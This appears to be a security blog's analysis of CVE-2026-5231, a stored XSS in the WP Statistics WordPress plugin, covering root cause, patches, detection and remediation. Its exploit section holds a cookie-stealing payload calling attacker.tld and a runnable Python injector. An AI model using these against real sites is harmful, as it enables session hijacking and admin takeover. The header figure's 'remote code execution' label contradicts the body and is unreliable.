CVE Analysis 2026-04-17 · 7 min read

CVE-2026-5231: WP Statistics utm_source Stored XSS via innerHTML Sink

WP Statistics ≤14.16.4 copies raw utm_source into source_name on wildcard channel match, then renders it via innerHTML in admin chart legends — no escaping, no authentication required.

#cross-site-scripting #stored-xss #wordpress-plugin #input-sanitization #output-escaping
[Figure: Attack flow, CVE-2026-5231 (panel title: Remote Code Execution). Attacker (remote / unauth) → Remote code exec (CVE-2026-5231, cross-platform, HIGH) → Code exec (arbitrary code runs as target) → Compromise (full access). No confirmed exploits.]

Vulnerability Overview

CVE-2026-5231 is a stored cross-site scripting vulnerability in the WP Statistics WordPress plugin affecting all versions through 14.16.4. An unauthenticated attacker can inject arbitrary JavaScript by supplying a crafted utm_source query parameter in any page request. The payload survives two serialization boundaries — HTTP request to database, database to rendered admin page — because neither boundary applies HTML escaping to the referral source name. The script executes in the context of the administrator's browser session the next time they visit the Referrals Overview or Social Media analytics pages.

CVSS 7.2 (HIGH) is appropriate: exploitation requires no credentials, but impact is constrained to the admin panel context. In practice, XSS in a WordPress admin page is frequently a stepping stone to PHP code execution via plugin/theme editor or nonce-authenticated AJAX endpoints.

Affected Component

Two subsystems are responsible:

  • Referral parser: WP_Statistics\Hits::record() and the channel-matching logic inside WP_Statistics\GeoIP\Referred::get_source_name(). This runs on every frontend page load.
  • Chart renderer: the JavaScript bundle that reads referral rows from a REST/AJAX endpoint and inserts legend labels with innerHTML rather than textContent.

The database table involved is {prefix}statistics_visitor, specifically the referred column, which stores the full referrer URL, and the companion view/aggregate table that stores the resolved source_name.

Root Cause Analysis

The referral parser walks a list of configured channel definitions. Each channel has an optional domains allowlist. When a channel is configured with a wildcard (*) domain entry, the code falls through to copying the caller-supplied UTM parameter directly into source_name without sanitization.


/**
 * Reconstructed pseudocode: WP_Statistics\GeoIP\Referred::get_source_name()
 * Approximates plugin PHP logic in C-style pseudocode for clarity.
 */
char *get_source_name(http_request_t *req, channel_list_t *channels) {
    const char *utm_source = get_query_param(req, "utm_source"); // attacker-controlled
    const char *referrer   = get_header(req, "Referer");

    for (int i = 0; i < channels->count; i++) {
        channel_t *ch = &channels->entries[i];

        if (domain_matches(referrer, ch->domains)) {
            return sanitize_and_copy(ch->label); // safe path: known domain
        }

        if (ch->wildcard_enabled) {              // wildcard channel configured
            if (utm_source != NULL) {
                // BUG: utm_source is copied verbatim into source_name;
                //      no wp_kses(), no esc_attr(), no htmlspecialchars()
                return strdup(utm_source);       // raw attacker input persists to DB
            }
            return strdup(ch->label);
        }
    }
    return parse_domain_from_referrer(referrer); // fallback
}
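
The branch structure above can be modelled in a few lines of Python to show which inputs reach source_name untouched. This is a minimal sketch, not the plugin's code: the Channel dataclass, the resolve_source_name() helper, and the sample channel list are hypothetical names introduced for illustration.

```python
from dataclasses import dataclass, field
from typing import Optional
from urllib.parse import urlparse


@dataclass
class Channel:
    """Hypothetical stand-in for one configured referral channel."""
    label: str
    domains: list = field(default_factory=list)
    wildcard: bool = False


def resolve_source_name(utm_source: Optional[str], referrer: Optional[str],
                        channels: list) -> str:
    """Mirror the pseudocode: known domain -> label, wildcard -> raw utm_source."""
    host = urlparse(referrer).hostname if referrer else None
    for ch in channels:
        if host and host in ch.domains:
            return ch.label            # safe path: fixed, site-defined label
        if ch.wildcard:
            if utm_source is not None:
                return utm_source      # vulnerable path: attacker input, verbatim
            return ch.label
    return host or ""                  # fallback: domain parsed from the referrer


channels = [
    Channel("Search", domains=["www.google.com"]),
    Channel("Campaigns", wildcard=True),
]

payload = "<img src=x onerror=alert(1)>"
print(resolve_source_name(None, "https://www.google.com/", channels))  # Search
print(resolve_source_name(payload, None, channels) == payload)         # True
```

Only the wildcard branch returns a caller-supplied string; every other path returns a value the site operator or the URL parser produced.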

The stored source_name value is later fetched by a REST endpoint (/wp-json/wp-statistics/v2/referrals) and consumed by the frontend chart renderer. The renderer builds legend HTML with direct string concatenation into innerHTML:


/**
 * Reconstructed pseudocode: chart legend builder (JavaScript → C-style)
 * Mirrors the pattern in WP Statistics' Chartist/Chart.js integration layer.
 */
void render_referral_legend(chart_t *chart, referral_row_t *rows, int count) {
    char legend_html[MAX_LEGEND_SIZE] = {0};
    char entry_buf[512];

    for (int i = 0; i < count; i++) {
        // BUG: source_name inserted into HTML string without escaping;
        //      equivalent JS: legendEl.innerHTML += `<li>${row.source_name}</li>`
        snprintf(entry_buf, sizeof(entry_buf),
                 "<li>"
                 "<span class=\"color\" style=\"background:%s\"></span>"
                 "%s"                    // <-- source_name dropped in raw
                 "</li>",
                 rows[i].color,
                 rows[i].source_name);   // attacker-controlled, unescaped
        strlcat(legend_html, entry_buf, MAX_LEGEND_SIZE);
    }
    // Equivalent to: document.getElementById('legend').innerHTML = legend_html;
    set_element_inner_html(chart->legend_element, legend_html); // XSS sink
}
    Root cause: The wildcard channel branch in the referral parser promotes the raw utm_source query parameter to a persistent source_name record without HTML encoding, and the chart legend renderer later writes that value to the DOM via innerHTML instead of textContent.
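
The renderer half of the root cause can be reproduced without a browser. The sketch below builds the legend markup twice in Python, once by raw concatenation (the innerHTML pattern) and once with html.escape(). The function names and the sample row are hypothetical, and html.escape() only stands in for whatever escaping the real fix applies.

```python
import html


def legend_html_unsafe(rows):
    """Concatenate source_name into markup verbatim (the vulnerable pattern)."""
    return "".join(f"<li>{row['source_name']}</li>" for row in rows)


def legend_html_escaped(rows):
    """Same markup, but source_name is HTML-escaped before insertion."""
    return "".join(f"<li>{html.escape(row['source_name'])}</li>" for row in rows)


rows = [{"source_name": "<img src=x onerror=alert(1)>"}]

print(legend_html_unsafe(rows))
# <li><img src=x onerror=alert(1)></li>
print(legend_html_escaped(rows))
# <li>&lt;img src=x onerror=alert(1)&gt;</li>
```

In the first output the browser would see a real img element; in the second it would see text.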

    Exploitation Mechanics

    
    EXPLOIT CHAIN:
    
    1. INJECT PHASE (unauthenticated, one HTTP request):
       GET /?utm_source=<img src=x onerror=fetch(`https://attacker.tld/c?k=`+document.cookie)> HTTP/1.1
       Host: target-wordpress.example.com
    
       - Plugin's hit recording fires on the frontend page load
       - get_source_name() matches wildcard channel (no domain restriction)
       - Raw utm_source value written to wp_statistics_visitor.referred /
         source_name aggregate column — payload now persisted in DB
    
    2. DORMANT STATE:
       - Payload sits in the referral statistics table
       - Survives across requests; no TTL unless admin manually purges stats
    
    3. TRIGGER PHASE (victim: authenticated administrator):
       - Admin navigates to:
           /wp-admin/admin.php?page=wps_referrals_overview
         OR
           /wp-admin/admin.php?page=wps_social_media
       - Page JS fetches /wp-json/wp-statistics/v2/referrals (or equivalent AJAX)
       - JSON response includes source_name with raw HTML payload
       - Chart legend renderer: legendEl.innerHTML += `<li>${source_name}</li>`
       - Browser parses injected tag, fires onerror handler
    
    4. IMPACT (examples):
       a. Session hijack: exfiltrate document.cookie to attacker C2
       b. Credential theft: inject fake wp-login overlay, harvest password
       c. Backdoor: use admin nonce + AJAX to install malicious plugin
          POST /wp-admin/admin-ajax.php  action=install-plugin
       d. Persistence: wp_insert_user() via REST to create shadow admin

    A minimal proof-of-concept request demonstrating the injection:

    
    #!/usr/bin/env python3
    # CVE-2026-5231 — WP Statistics utm_source stored XSS injector
    # Usage: python3 poc.py https://target.example.com [callback_url]
    
    import sys, requests, urllib.parse
    
    TARGET  = sys.argv[1].rstrip('/')
    CB      = sys.argv[2] if len(sys.argv) > 2 else "https://attacker.tld/collect"
    
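    # Payload: exfiltrate cookies to the callback URL
    # (same img/onerror pattern as the inject-phase request above)
    PAYLOAD = (
        '<img src=x onerror=fetch(`{cb}?k=`+document.cookie)>'
    ).format(cb=CB)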
    
    params = {
        "utm_source":   PAYLOAD,
        "utm_medium":   "referral",
        "utm_campaign": "test",
    }
    
    # Any page on the target site triggers hit recording
    r = requests.get(TARGET + "/", params=params, timeout=10)
    print(f"[*] Request sent — HTTP {r.status_code}")
    print(f"[*] Payload length: {len(PAYLOAD)} bytes")
    print(f"[*] Encoded UTM:    {urllib.parse.quote(PAYLOAD)[:80]}...")
    print("[!] Payload now stored. Awaiting admin page load.")
    

    Memory Layout

    This is a DOM-based stored XSS, so "memory" is the browser's DOM tree and the plugin's database row rather than heap memory. The relevant data flow across persistence boundaries is:

    
    DATA FLOW — PAYLOAD THROUGH PERSISTENCE BOUNDARIES:
    
    ┌─────────────────────────────────────────────────────────────────┐
    │ BOUNDARY 1: HTTP → PHP (no sanitization)                        │
    │                                                                 │
    │  $_GET['utm_source']                                            │
    │  = '<img src=x onerror=fetch(...)>'                             │
    │       │                                                         │
    │       ▼  get_source_name(): wildcard branch, raw strdup()       │
    │  $source_name = '<img src=x onerror=fetch(...)>'  ← UNSANITIZED │
    └─────────────────────────────────────────────────────────────────┘
                           │
                           ▼  $wpdb->insert() / update_option()
    ┌─────────────────────────────────────────────────────────────────┐
    │ BOUNDARY 2: PHP → MySQL (parameterized, but content is raw HTML)│
    │                                                                 │
    │  wp_statistics_visitor row:                                     │
    │    id          | INT  | 4821                                    │
    │    referred    | TEXT | https://...?utm_source=<img src=x ...>  │
    │    source_name | TEXT | <img src=x onerror=fetch(...)>  ← STORED│
    │    hits        | INT  | 1                                       │
    └─────────────────────────────────────────────────────────────────┘
                           │
                           ▼  REST API JSON response
    ┌─────────────────────────────────────────────────────────────────┐
    │ BOUNDARY 3: MySQL → JSON → JavaScript (no output escaping)      │
    │                                                                 │
    │  {"source_name": "<img src=x onerror=fetch(...)>", ...}         │
    │       │                                                         │
    │       ▼  legendEl.innerHTML += `<li>${data.source_name}</li>`   │
    │                                                                 │
    │  DOM AFTER INSERTION:                                           │
    │    <ul>                                                         │
    │      <li>                                                       │
    │        <img src=x onerror=fetch(...)>   ← XSS FIRES             │
    │      </li>                                                      │
    │    </ul>                                                        │
    └─────────────────────────────────────────────────────────────────┘

    Note that SQL parameterization correctly prevents SQL injection — the payload transits the database safely. The vulnerability is entirely in the missing HTML context encoding at ingress and the innerHTML sink at render time.
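
The point about parameterization is easy to check in isolation. The following sketch uses Python's sqlite3 module with an in-memory table as a stand-in for MySQL and $wpdb; the table and column names are simplified assumptions. The bound parameter is stored character for character, so the query is safe as SQL while the value remains active HTML.

```python
import sqlite3

payload = "<img src=x onerror=alert(1)>"

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE visitor (id INTEGER PRIMARY KEY, source_name TEXT)")

# Parameter binding keeps the value out of the SQL grammar entirely.
conn.execute("INSERT INTO visitor (source_name) VALUES (?)", (payload,))

stored = conn.execute("SELECT source_name FROM visitor").fetchone()[0]
print(stored == payload)   # True: the markup round-trips unchanged
conn.close()
```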

    Patch Analysis

    A correct fix requires sanitization at both boundaries: at write time (defense-in-depth) and at render time (the mandatory fix). Patching only one boundary is insufficient.

    
    // ── BEFORE (vulnerable) ── get_source_name(), wildcard branch:
    if (ch->wildcard_enabled) {
        if (utm_source != NULL) {
            return strdup(utm_source);   // raw input, no sanitization
        }
    }
    
    // ── AFTER (patched) ── sanitize at ingress with WordPress APIs:
    if (ch->wildcard_enabled) {
        if (utm_source != NULL) {
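            // sanitize_text_field() strips tags, line breaks, and percent-encoded
            // octets, and converts a stray '<' to an entity. It is not an HTML
            // escaper, so render-time escaping is still required.
            // Equivalent PHP: sanitize_text_field( wp_unslash( $utm_source ) )
            char *clean = sanitize_text_field(wp_unslash(utm_source));
            return strdup(clean);        // tags stripped before the value is stored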
        }
    }
    
    
    // ── BEFORE (vulnerable) ── chart legend renderer (JavaScript):
    //   legendEl.innerHTML += `<li>${row.source_name}</li>`;

    // ── AFTER (patched) ── use textContent for untrusted data,
    //    or escape before insertion:

    // Option A (preferred): no innerHTML for untrusted strings
    const li   = document.createElement('li');
    const span = document.createElement('span');
    span.className = 'color';
    span.style.background = row.color;   // color is hex-validated server-side
    li.appendChild(span);
    li.appendChild(document.createTextNode(row.source_name)); // textContent: safe
    legendEl.appendChild(li);

    // Option B: escape helper (acceptable if Option A is not feasible)
    function escHtml(s) {
        return s.replace(/&/g, '&amp;')
                .replace(/</g, '&lt;')
                .replace(/>/g, '&gt;')
                .replace(/"/g, '&quot;')
                .replace(/'/g, '&#39;');
    }
    // legendEl.innerHTML += `<li>${escHtml(row.source_name)}</li>`;

    Additionally, the REST endpoint returning referral data should apply esc_html() to source_name values before serializing to JSON, ensuring that any legacy unescaped rows already in the database are neutralized at output time regardless of when they were written.
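
Output-side neutralization of legacy rows could look roughly like the sketch below. It is written in Python rather than PHP, with html.escape() standing in for esc_html(); the serialize_referrals() helper and the row shape are hypothetical.

```python
import html
import json


def serialize_referrals(rows):
    """Escape source_name on the way out, regardless of how it was stored."""
    safe_rows = [
        {**row, "source_name": html.escape(str(row["source_name"]))}
        for row in rows
    ]
    return json.dumps(safe_rows)


legacy_rows = [
    {"source_name": "newsletter", "hits": 12},
    {"source_name": "<img src=x onerror=alert(1)>", "hits": 1},  # pre-patch row
]

print(serialize_referrals(legacy_rows))
```

One design consequence: if the client also escapes, or writes the value with textContent, the entities will be displayed literally, so the server and the renderer need to agree on which layer encodes.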

    Detection and Indicators

    Server-side (access logs): Look for utm_source values containing HTML metacharacters in GET requests to any WordPress frontend URL:

    
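    # Grep pattern for Apache/Nginx combined log format.
    # Logs normally hold the percent-encoded form, so match %3C, %3E, %22, %27
    # (case-insensitive) as well as raw <, >, and ':
    grep -Ei 'utm_source=[^&" ]*(%3c|%3e|%22|%27|[<>'\''])' /var/log/nginx/access.log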
    
    # Suspicious example lines:
    203.0.113.42 - - [01/Jun/2026:14:22:01 +0000] "GET /?utm_source=%3Cimg+src%3Dx+onerror%3D... HTTP/1.1" 200 -
    198.51.100.7 - - [01/Jun/2026:14:22:44 +0000] "GET /?utm_source=%3Cscript%3E... HTTP/1.1" 200 -
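
Because access logs usually record the percent-encoded form, decoding before matching avoids having to enumerate every encoding in the pattern. The sketch below is one way to do that in Python; it assumes combined log format with the request line in a quoted field, and the suspicious_utm_source() helper is a hypothetical name.

```python
import re
from urllib.parse import urlsplit, parse_qs

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
HTML_META = re.compile(r"[<>\"']")


def suspicious_utm_source(log_line):
    """Return the decoded utm_source if it contains HTML metacharacters, else None."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    query = urlsplit(match.group(1)).query
    # parse_qs percent-decodes values and turns '+' into a space.
    for value in parse_qs(query).get("utm_source", []):
        if HTML_META.search(value):
            return value
    return None


line = ('203.0.113.42 - - [01/Jun/2026:14:22:01 +0000] '
        '"GET /?utm_source=%3Cimg+src%3Dx+onerror%3Dalert(1)%3E HTTP/1.1" 200 -')
print(suspicious_utm_source(line))   # <img src=x onerror=alert(1)>
```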
    

    Database: Query for stored payloads directly:

    
    SELECT id, referred, source_name, created
    FROM   wp_statistics_visitor
    WHERE  source_name REGEXP '[<>"'']'
       OR  source_name LIKE '%onerror%'
       OR  source_name LIKE '%javascript:%'
       OR  source_name LIKE '%<script%';

    WAF signatures: Block or sanitize utm_source parameters at the edge containing <, >, javascript:, onerror, onload. ModSecurity rule 942100 (SQL injection) will not fire here — a dedicated XSS rule set (e.g., OWASP CRS 941xxx rules) is required.

    Browser-side: A Content Security Policy header preventing inline event handlers would break most practical payloads:

    
    Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none';
    

    WP Statistics does not set CSP headers, leaving the admin panel fully exposed.

    Remediation

    • Update immediately: Apply the vendor patch released after 14.16.4. The fix is in the referral ingestion path and the chart rendering template.
    • Purge existing payloads: Run the detection query above and DELETE or sanitize affected rows in wp_statistics_visitor before upgrading. Rows written before the upgrade keep their payload, so they will still trigger the XSS after patching unless the output-side fix is in place.
    • Edge sanitization: Deploy a WAF rule to strip HTML metacharacters from UTM parameters before they reach WordPress. This is a compensating control, not a substitute for the code fix.
    • Reduce attack surface: Restrict the WP Statistics admin pages to IP allowlists using wp-admin IP filtering if the update cannot be applied immediately.
    • Audit custom channels: If wildcard domain entries are present in the WP Statistics channel configuration, consider removing them or replacing them with explicit domain lists to eliminate the vulnerable code path entirely.
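
The edge-sanitization item could be prototyped along the lines below, for example in a reverse-proxy hook. This is a sketch under stated assumptions: scrub_utm_params() and the STRIP character set are hypothetical, and a production WAF rule would be written in the WAF's own rule language.

```python
from urllib.parse import urlsplit, urlunsplit, parse_qsl, urlencode

# Characters removed from utm_* values (an illustrative choice, not a standard).
STRIP = str.maketrans("", "", "<>\"'`")


def scrub_utm_params(url):
    """Remove HTML metacharacters from utm_* values; leave other params alone."""
    parts = urlsplit(url)
    cleaned = [
        (key, value.translate(STRIP) if key.startswith("utm_") else value)
        for key, value in parse_qsl(parts.query, keep_blank_values=True)
    ]
    return urlunsplit(parts._replace(query=urlencode(cleaned)))


print(scrub_utm_params("https://example.com/?utm_source=%3Cb%3Ehi%3C/b%3E&page=2"))
# https://example.com/?utm_source=bhi%2Fb&page=2
```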
    CypherByte Research
    Mobile security intelligence · cypherbyte.io